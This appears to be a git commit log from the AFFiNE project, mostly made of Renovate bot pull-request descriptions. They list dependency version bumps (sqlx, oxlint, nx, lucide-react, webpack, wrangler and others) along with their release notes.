- \[[#​3233]]: fix: get_filename should not consume self \[\[[@​jasonish](https://togithub.com/jasonish )]]
- \[[#​3234]]: fix(ci): pin Rust version, ditch unmaintained actions \[\[[@​abonander](https://togithub.com/abonander )]]
- \[[#​3236]]: fix: resolve `path` ownership problems when using `sqlx_macros_unstable` \[\[[@​lily-mosquitoes](https://togithub.com/lily-mosquitoes )]]
- \[[#​3254]]: fix: hide `sqlx_postgres::any` \[\[[@​Zarathustra2](https://togithub.com/Zarathustra2 )]]
- \[[#​3266]]: ci: MariaDB - add back 11.4 and add 11.5 \[\[[@​grooverdan](https://togithub.com/grooverdan )]]
- \[[#​3267]]: ci: syntax fix \[\[[@​grooverdan](https://togithub.com/grooverdan )]]
- \[[#​3271]]: docs(sqlite): fix typo - unixtime() -> unixepoch() \[\[[@​joelkoen](https://togithub.com/joelkoen )]]
- \[[#​3276]]: Invert boolean for `migrate` error message. ([#​3275](https://togithub.com/launchbadge/sqlx/issues/3275 )) \[\[[@​nk9](https://togithub.com/nk9 )]]
- \[[#​3279]]: fix Clippy errors \[\[[@​abonander](https://togithub.com/abonander )]]
- \[[#​3288]]: fix: sqlite update_hook char types \[\[[@​jasonish](https://togithub.com/jasonish )]]
- \[[#​3297]]: Pass the `persistent` query setting when preparing queries with the `Any` driver \[\[[@​etorreborre](https://togithub.com/etorreborre )]]
- \[[#​3298]]: Track null arguments in order to provide the appropriate type when converting them. \[\[[@​etorreborre](https://togithub.com/etorreborre )]]
- \[[#​3312]]: doc: Minor rust docs fixes \[\[[@​SrGesus](https://togithub.com/SrGesus )]]
- \[[#​3327]]: chore: fixed one usage of `select_input_type!()` being unhygenic \[\[[@​CommanderStorm](https://togithub.com/CommanderStorm )]]
- \[[#​3328]]: fix(ci): comment not separated from other characters \[\[[@​hamirmahal](https://togithub.com/hamirmahal )]]
- \[[#​3341]]: refactor: Resolve cargo check warnings in postgres examples \[\[[@​iamjpotts](https://togithub.com/iamjpotts )]]
- \[[#​3346]]: fix(postgres): don't panic if `M` or `C` Notice fields are not UTF-8 \[\[[@​YgorSouza](https://togithub.com/YgorSouza )]]
- \[[#​3350]]: fix:the `json`-feature should activate `sqlx-postgres?/json` as well \[\[[@​CommanderStorm](https://togithub.com/CommanderStorm )]]
- \[[#​3353]]: fix: build script new line at eof \[\[[@​Zarthus](https://togithub.com/Zarthus )]]
- (no PR): activate `clock` and `std` features of `workspace.dependencies.chrono`.
[#​2482]: https://togithub.com/launchbadge/sqlx/pull/2482
[#​2652]: https://togithub.com/launchbadge/sqlx/pull/2652
[#​2697]: https://togithub.com/launchbadge/sqlx/pull/2697
[#​2702]: https://togithub.com/launchbadge/sqlx/pull/2702
[#​2736]: https://togithub.com/launchbadge/sqlx/pull/2736
[#​2869]: https://togithub.com/launchbadge/sqlx/pull/2869
[#​2917]: https://togithub.com/launchbadge/sqlx/pull/2917
[#​2940]: https://togithub.com/launchbadge/sqlx/pull/2940
[#​2954]: https://togithub.com/launchbadge/sqlx/pull/2954
[#​2960]: https://togithub.com/launchbadge/sqlx/pull/2960
[#​2970]: https://togithub.com/launchbadge/sqlx/pull/2970
[#​2973]: https://togithub.com/launchbadge/sqlx/pull/2973
[#​3064]: https://togithub.com/launchbadge/sqlx/pull/3064
[#​3073]: https://togithub.com/launchbadge/sqlx/pull/3073
[#​3113]: https://togithub.com/launchbadge/sqlx/pull/3113
[#​3123]: https://togithub.com/launchbadge/sqlx/pull/3123
[#​3126]: https://togithub.com/launchbadge/sqlx/pull/3126
[#​3130]: https://togithub.com/launchbadge/sqlx/pull/3130
[#​3137]: https://togithub.com/launchbadge/sqlx/pull/3137
[#​3138]: https://togithub.com/launchbadge/sqlx/pull/3138
[#​3146]: https://togithub.com/launchbadge/sqlx/pull/3146
[#​3148]: https://togithub.com/launchbadge/sqlx/pull/3148
[#​3154]: https://togithub.com/launchbadge/sqlx/pull/3154
[#​3162]: https://togithub.com/launchbadge/sqlx/pull/3162
[#​3165]: https://togithub.com/launchbadge/sqlx/pull/3165
[#​3167]: https://togithub.com/launchbadge/sqlx/pull/3167
[#​3172]: https://togithub.com/launchbadge/sqlx/pull/3172
[#​3173]: https://togithub.com/launchbadge/sqlx/pull/3173
[#​3181]: https://togithub.com/launchbadge/sqlx/pull/3181
[#​3184]: https://togithub.com/launchbadge/sqlx/pull/3184
[#​3188]: https://togithub.com/launchbadge/sqlx/pull/3188
[#​3190]: https://togithub.com/launchbadge/sqlx/pull/3190
[#​3191]: https://togithub.com/launchbadge/sqlx/pull/3191
[#​3194]: https://togithub.com/launchbadge/sqlx/pull/3194
[#​3216]: https://togithub.com/launchbadge/sqlx/pull/3216
[#​3230]: https://togithub.com/launchbadge/sqlx/pull/3230
[#​3233]: https://togithub.com/launchbadge/sqlx/pull/3233
[#​3234]: https://togithub.com/launchbadge/sqlx/pull/3234
[#​3236]: https://togithub.com/launchbadge/sqlx/pull/3236
[#​3244]: https://togithub.com/launchbadge/sqlx/pull/3244
[#​3252]: https://togithub.com/launchbadge/sqlx/pull/3252
[#​3254]: https://togithub.com/launchbadge/sqlx/pull/3254
[#​3260]: https://togithub.com/launchbadge/sqlx/pull/3260
[#​3265]: https://togithub.com/launchbadge/sqlx/pull/3265
[#​3266]: https://togithub.com/launchbadge/sqlx/pull/3266
[#​3267]: https://togithub.com/launchbadge/sqlx/pull/3267
[#​3271]: https://togithub.com/launchbadge/sqlx/pull/3271
[#​3276]: https://togithub.com/launchbadge/sqlx/pull/3276
[#​3279]: https://togithub.com/launchbadge/sqlx/pull/3279
[#​3285]: https://togithub.com/launchbadge/sqlx/pull/3285
[#​3288]: https://togithub.com/launchbadge/sqlx/pull/3288
[#​3291]: https://togithub.com/launchbadge/sqlx/pull/3291
[#​3293]: https://togithub.com/launchbadge/sqlx/pull/3293
[#​3297]: https://togithub.com/launchbadge/sqlx/pull/3297
[#​3298]: https://togithub.com/launchbadge/sqlx/pull/3298
[#​3303]: https://togithub.com/launchbadge/sqlx/pull/3303
[#​3311]: https://togithub.com/launchbadge/sqlx/pull/3311
[#​3312]: https://togithub.com/launchbadge/sqlx/pull/3312
[#​3327]: https://togithub.com/launchbadge/sqlx/pull/3327
[#​3328]: https://togithub.com/launchbadge/sqlx/pull/3328
[#​3329]: https://togithub.com/launchbadge/sqlx/pull/3329
[#​3337]: https://togithub.com/launchbadge/sqlx/pull/3337
[#​3340]: https://togithub.com/launchbadge/sqlx/pull/3340
[#​3341]: https://togithub.com/launchbadge/sqlx/pull/3341
[#​3343]: https://togithub.com/launchbadge/sqlx/pull/3343
[#​3346]: https://togithub.com/launchbadge/sqlx/pull/3346
[#​3350]: https://togithub.com/launchbadge/sqlx/pull/3350
[#​3352]: https://togithub.com/launchbadge/sqlx/pull/3352
[#​3353]: https://togithub.com/launchbadge/sqlx/pull/3353
[#​3356]: https://togithub.com/launchbadge/sqlx/pull/3356
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-24 12:47:32 +00:00
renovate
130dc2bd8b
chore: bump up oxlint version to v0.8.0 ( #7962 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [oxlint](https://oxc.rs ) ([source](https://togithub.com/oxc-project/oxc/tree/HEAD/npm/oxlint )) | [`0.7.2` -> `0.8.0`](https://renovatebot.com/diffs/npm/oxlint/0.7.2/0.8.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
---
### Release Notes
<details>
<summary>oxc-project/oxc (oxlint)</summary>
### [`v0.8.0`](https://togithub.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#080---2024-08-23 )
[Compare Source](b3e189764f...8ef85a43c0 )
##### Features
- [`a0effab`](https://togithub.com/oxc-project/oxc/commit/a0effab ) linter: Support more flexible config.globals values ([#​4990](https://togithub.com/oxc-project/oxc/issues/4990 )) (Don Isaac)
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-23 16:19:40 +00:00
renovate
442a843257
chore: bump up all non-major dependencies ( #7953 )
...
[](https://renovatebot.com )
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.635.0` -> `3.637.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.635.0/3.637.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://togithub.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.635.0` -> `3.637.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.635.0/3.637.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@keyv/redis](https://togithub.com/jaredwray/keyv ) | [`3.0.0` -> `3.0.1`](https://renovatebot.com/diffs/npm/@keyv%2fredis/3.0.0/3.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@napi-rs/simple-git](https://togithub.com/Brooooooklyn/simple-git ) | [`0.1.17` -> `0.1.18`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.17/0.1.18 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@napi-rs/simple-git](https://togithub.com/Brooooooklyn/simple-git ) | [`0.1.17` -> `0.1.18`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.17/0.1.18 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@nx/vite](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/vite )) | [`19.6.1` -> `19.6.2`](https://renovatebot.com/diffs/npm/@nx%2fvite/19.6.1/19.6.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@opentelemetry/semantic-conventions](https://togithub.com/open-telemetry/opentelemetry-js/tree/main/semantic-conventions ) ([source](https://togithub.com/open-telemetry/opentelemetry-js )) | [`1.25.1` -> `1.26.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsemantic-conventions/1.25.1/1.26.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [foxact](https://foxact.skk.moe ) ([source](https://togithub.com/SukkaW/foxact )) | [`0.2.36` -> `0.2.37`](https://renovatebot.com/diffs/npm/foxact/0.2.36/0.2.37 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.429.0` -> `^0.435.0`](https://renovatebot.com/diffs/npm/lucide-react/0.429.0/0.435.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.16.0` -> `20.17.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | minor |
| [nx](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.6.1` -> `19.6.2`](https://renovatebot.com/diffs/npm/nx/19.6.1/19.6.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [react-resizable-panels](https://togithub.com/bvaughn/react-resizable-panels ) | [`2.1.0` -> `2.1.1`](https://renovatebot.com/diffs/npm/react-resizable-panels/2.1.0/2.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-transition-state](https://szhsin.github.io/react-transition-state/ ) ([source](https://togithub.com/szhsin/react-transition-state )) | [`2.1.1` -> `2.1.2`](https://renovatebot.com/diffs/npm/react-transition-state/2.1.1/2.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [webpack](https://togithub.com/webpack/webpack ) | [`5.93.0` -> `5.94.0`](https://renovatebot.com/diffs/npm/webpack/5.93.0/5.94.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [wrangler](https://togithub.com/cloudflare/workers-sdk ) ([source](https://togithub.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.72.1` -> `3.72.2`](https://renovatebot.com/diffs/npm/wrangler/3.72.1/3.72.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.637.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36370-2024-08-22 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.635.0...v3.637.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
</details>
<details>
<summary>Brooooooklyn/simple-git (@​napi-rs/simple-git)</summary>
### [`v0.1.18`](https://togithub.com/Brooooooklyn/simple-git/releases/tag/v0.1.18 )
[Compare Source](https://togithub.com/Brooooooklyn/simple-git/compare/v0.1.17...v0.1.18 )
##### Core features:
##### Blob API
```js
import { Repository } from "@​napi-rs/simple-git";
const repo = new Repository(".");
const blob = repo.head().peelToTree()
.getPath("__test__/repo.spec.mjs")
.toObject(repo)
.peelToBlob();
const fileContent = Buffer.from(blob.content()).toString("utf8");
```
##### What's Changed
- chore(deps): update yarn to v4.4.0 by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/58 ](https://togithub.com/Brooooooklyn/simple-git/pull/58 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/57 ](https://togithub.com/Brooooooklyn/simple-git/pull/57 )
- feat: implment blob and related features by [@​Brooooooklyn](https://togithub.com/Brooooooklyn ) in [https://github.com/Brooooooklyn/simple-git/pull/59 ](https://togithub.com/Brooooooklyn/simple-git/pull/59 )
**Full Changelog**: https://github.com/Brooooooklyn/simple-git/compare/v0.1.17...v0.1.18
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.6.2`](https://togithub.com/nrwl/nx/releases/tag/19.6.2 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.6.1...19.6.2 )
##### 19.6.2 (2024-08-21)
##### 🚀 Features
- **bundling:** add option to generate sourcemaps for Rollup build ([#​27539](https://togithub.com/nrwl/nx/pull/27539 ))
- **devkit:** prefer strings over Linter enum ([#​27209](https://togithub.com/nrwl/nx/pull/27209 ))
- **graph:** add expandedTargets to project details on nx dev ([#​26911](https://togithub.com/nrwl/nx/pull/26911 ))
- **js:** add skipPackageManager option to build executors in order to skip generating "packageManager" entry in package.json ([#​27518](https://togithub.com/nrwl/nx/pull/27518 ))
- **nx-dev:** honor prefers-reduced-motion ([#​27541](https://togithub.com/nrwl/nx/pull/27541 ))
##### 🩹 Fixes
- missing export for setRemoteDefinition ([#​27491](https://togithub.com/nrwl/nx/pull/27491 ))
- **core:** fix importing files with special characters ([#​27484](https://togithub.com/nrwl/nx/pull/27484 ))
- **core:** use withVerbose util ([#​27553](https://togithub.com/nrwl/nx/pull/27553 ))
- **core:** support import detection of packages installed from git remote URL ([#​27569](https://togithub.com/nrwl/nx/pull/27569 ))
- **esbuild:** declaration:true should find the correct package root regardless of cwd [#​26261](https://togithub.com/nrwl/nx/issues/26261 ) ([#​27560](https://togithub.com/nrwl/nx/pull/27560 ), [#​26261](https://togithub.com/nrwl/nx/issues/26261 ))
- **gradle:** track childProjects in properties report ([#​27488](https://togithub.com/nrwl/nx/pull/27488 ))
- **gradle:** fix tasksFileLines might be undefined ([#​27548](https://togithub.com/nrwl/nx/pull/27548 ))
- **js:** only sync references when composite is true, preserve comments in other parts of file ([#​27530](https://togithub.com/nrwl/nx/pull/27530 ))
- **js:** ensure assets option in tsc executor defaults to empty array for programmatic usage ([#​27565](https://togithub.com/nrwl/nx/pull/27565 ))
- **module-federation:** ensure shared packages can be shared from host [#​27162](https://togithub.com/nrwl/nx/issues/27162 ) ([#​27513](https://togithub.com/nrwl/nx/pull/27513 ), [#​27162](https://togithub.com/nrwl/nx/issues/27162 ))
- **nextjs:** should not fail when running outside of nx cli ([#​27523](https://togithub.com/nrwl/nx/pull/27523 ))
- **nextjs:** Should be able to run custom server targets with swc ([#​27526](https://togithub.com/nrwl/nx/pull/27526 ))
- **nextjs:** schema type for unitTestRunner for library ([#​26824](https://togithub.com/nrwl/nx/pull/26824 ))
- **node:** generate webpack server apps with generatePackageJson:true by default ([#​27570](https://togithub.com/nrwl/nx/pull/27570 ))
- **nx-dev:** modify prompt ([#​27536](https://togithub.com/nrwl/nx/pull/27536 ))
- **nx-plugin:** allow create-package without e2eProject ([#​27572](https://togithub.com/nrwl/nx/pull/27572 ))
- **react:** handle more scenarios when collecting component props for generating stories ([#​27528](https://togithub.com/nrwl/nx/pull/27528 ))
- **storybook:** should generate correct config for nextjs apps [#​27233](https://togithub.com/nrwl/nx/issues/27233 ) ([#​27510](https://togithub.com/nrwl/nx/pull/27510 ), [#​27233](https://togithub.com/nrwl/nx/issues/27233 ))
- **testing:** fix issues in static server target migrations ([#​27547](https://togithub.com/nrwl/nx/pull/27547 ))
- **vite:** plugin should infer serve target if server config defined [#​27370](https://togithub.com/nrwl/nx/issues/27370 ) ([#​27507](https://togithub.com/nrwl/nx/pull/27507 ), [#​27370](https://togithub.com/nrwl/nx/issues/27370 ))
- **vite:** load the correct config file from [@​nx/vite](https://togithub.com/nx/vite ):test executor ([#​27514](https://togithub.com/nrwl/nx/pull/27514 ))
- **vite:** add typecheck inferred target for vite plugin [#​27501](https://togithub.com/nrwl/nx/issues/27501 ) ([#​27531](https://togithub.com/nrwl/nx/pull/27531 ), [#​27501](https://togithub.com/nrwl/nx/issues/27501 ))
##### ❤️ Thank You
- Colum Ferry [@​Coly010](https://togithub.com/Coly010 )
- Emily Xiong [@​xiongemi](https://togithub.com/xiongemi )
- Feliche-Demian Netliukh
- Guilherme Prezzi [@​menosprezzi](https://togithub.com/menosprezzi )
- Isaac Mann [@​isaacplmann](https://togithub.com/isaacplmann )
- Jack Hsu [@​jaysoo](https://togithub.com/jaysoo )
- James Henry [@​JamesHenry](https://togithub.com/JamesHenry )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Leosvel Pérez Espinosa [@​leosvelperez](https://togithub.com/leosvelperez )
- Nicholas Cunningham [@​ndcunningham](https://togithub.com/ndcunningham )
</details>
<details>
<summary>open-telemetry/opentelemetry-js (@​opentelemetry/semantic-conventions)</summary>
### [`v1.26.0`](https://togithub.com/open-telemetry/opentelemetry-js/compare/v1.25.1...3cf1c5215f2656ccb82e6a73cd9e6f2782f8d1cc )
[Compare Source](https://togithub.com/open-telemetry/opentelemetry-js/compare/v1.25.1...3cf1c5215f2656ccb82e6a73cd9e6f2782f8d1cc )
</details>
<details>
<summary>SukkaW/foxact (foxact)</summary>
### [`v0.2.37`](https://togithub.com/SukkaW/foxact/blob/HEAD/CHANGELOG.md#0237 )
[Compare Source](https://togithub.com/SukkaW/foxact/compare/0.2.36...0.2.37 )
**Core Changes**
- `foxact/rem` now also exports converter factory function
- `foxact/rem` now supports customize html font size
</details>
<details>
<summary>lucide-icons/lucide (lucide-react)</summary>
### [`v0.435.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.435.0 ): New icons 0.435.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.434.0...0.435.0 )
#### Modified Icons 🔨
- `milestone` ([#​2281](https://togithub.com/lucide-icons/lucide/issues/2281 )) by [@​jguddas](https://togithub.com/jguddas )
- `signpost` ([#​2281](https://togithub.com/lucide-icons/lucide/issues/2281 )) by [@​jguddas](https://togithub.com/jguddas )
### [`v0.434.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.434.0 ): New icons 0.434.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.433.0...0.434.0 )
#### New icons 🎨
- `volume-off` ([#​2378](https://togithub.com/lucide-icons/lucide/issues/2378 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
#### Modified Icons 🔨
- `file-volume` ([#​2378](https://togithub.com/lucide-icons/lucide/issues/2378 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `volume-1` ([#​2378](https://togithub.com/lucide-icons/lucide/issues/2378 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `volume-2` ([#​2378](https://togithub.com/lucide-icons/lucide/issues/2378 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `volume-x` ([#​2378](https://togithub.com/lucide-icons/lucide/issues/2378 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
- `volume` ([#​2378](https://togithub.com/lucide-icons/lucide/issues/2378 )) by [@​karsa-mistmere](https://togithub.com/karsa-mistmere )
### [`v0.433.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.433.0 ): New icons 0.433.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.432.0...0.433.0 )
#### New icons 🎨
- `trending-up-down` ([#​2372](https://togithub.com/lucide-icons/lucide/issues/2372 )) by [@​Alportan](https://togithub.com/Alportan )
#### Fixes Lucide Solid
- Fixed compilation issues when starting up Vite Dev server by [@​ericfennis](https://togithub.com/ericfennis ) in [https://github.com/lucide-icons/lucide/pull/2375 ](https://togithub.com/lucide-icons/lucide/pull/2375 )
### [`v0.432.0`](https://togithub.com/lucide-icons/lucide/releases/tag/0.432.0 ): New icons 0.432.0
[Compare Source](https://togithub.com/lucide-icons/lucide/compare/0.429.0...0.432.0 )
#### New icons 🎨
- `chart-gantt` ([#​2392](https://togithub.com/lucide-icons/lucide/issues/2392 )) by [@​jguddas](https://togithub.com/jguddas )
#### Modified Icons 🔨
- `contact-round` ([#​2391](https://togithub.com/lucide-icons/lucide/issues/2391 )) by [@​jguddas](https://togithub.com/jguddas )
- `contact` ([#​2391](https://togithub.com/lucide-icons/lucide/issues/2391 )) by [@​jguddas](https://togithub.com/jguddas )
</details>
<details>
<summary>nodejs/node (node)</summary>
### [`v20.17.0`](https://togithub.com/nodejs/node/compare/v20.16.0...v20.17.0 )
[Compare Source](https://togithub.com/nodejs/node/compare/v20.16.0...v20.17.0 )
</details>
<details>
<summary>bvaughn/react-resizable-panels (react-resizable-panels)</summary>
### [`v2.1.1`](https://togithub.com/bvaughn/react-resizable-panels/compare/2.1.0...2.1.1 )
[Compare Source](https://togithub.com/bvaughn/react-resizable-panels/compare/2.1.0...2.1.1 )
</details>
<details>
<summary>szhsin/react-transition-state (react-transition-state)</summary>
### [`v2.1.2`](https://togithub.com/szhsin/react-transition-state/releases/tag/v2.1.2 )
[Compare Source](https://togithub.com/szhsin/react-transition-state/compare/v2.1.1...v2.1.2 )
- Add switch transition examples in README [#​639](https://togithub.com/szhsin/react-transition-state/issues/639 )
</details>
<details>
<summary>webpack/webpack (webpack)</summary>
### [`v5.94.0`](https://togithub.com/webpack/webpack/compare/v5.93.0...eabf85d8580dfcb876b56957ba5488222a4f7873 )
[Compare Source](https://togithub.com/webpack/webpack/compare/v5.93.0...v5.94.0 )
</details>
<details>
<summary>cloudflare/workers-sdk (wrangler)</summary>
### [`v3.72.2`](https://togithub.com/cloudflare/workers-sdk/blob/HEAD/packages/wrangler/CHANGELOG.md#3722 )
[Compare Source](https://togithub.com/cloudflare/workers-sdk/compare/wrangler@3.72.1...wrangler@3.72.2 )
##### Patch Changes
- [#​6511](https://togithub.com/cloudflare/workers-sdk/pull/6511 ) [`e75c581`](e75c5812f5 ) Thanks [@​petebacondarwin](https://togithub.com/petebacondarwin )! - fix: allow Pages projects to use \`experimental:nodejs_compat_v2" flag
Fixes [#​6288](https://togithub.com/cloudflare/workers-sdk/issues/6288 )
- Updated dependencies \[[`b0e2f0b`](b0e2f0bfc6 ), [`f5bde66`](f5bde66914 )]:
- miniflare@3.20240821 .0
- [@​cloudflare/workers-shared](https://togithub.com/cloudflare/workers-shared )[@​0](https://togithub.com/0 ).3.0
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://togithub.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC4yNi4xIiwidXBkYXRlZEluVmVyIjoiMzguMjYuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-08-23 14:42:36 +00:00
darkskygit
0b3c7d1407
feat: update throttler ( #7957 )
2024-08-23 13:52:47 +00:00
renovate[bot]
49c8a25fce
chore: bump up @blocksuite/icons version to v2.1.64 ( #7945 )
...
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2024-08-23 12:22:06 +08:00
JimmFly
920afa7bf1
feat(core): adjust share menu ui ( #7931 )
...
https://github.com/user-attachments/assets/6538c046-3872-4c98-a389-81b86a2978a4
2024-08-23 02:07:51 +00:00
darkskygit
b57388fd85
feat: block slides insert before image load finished ( #7948 )
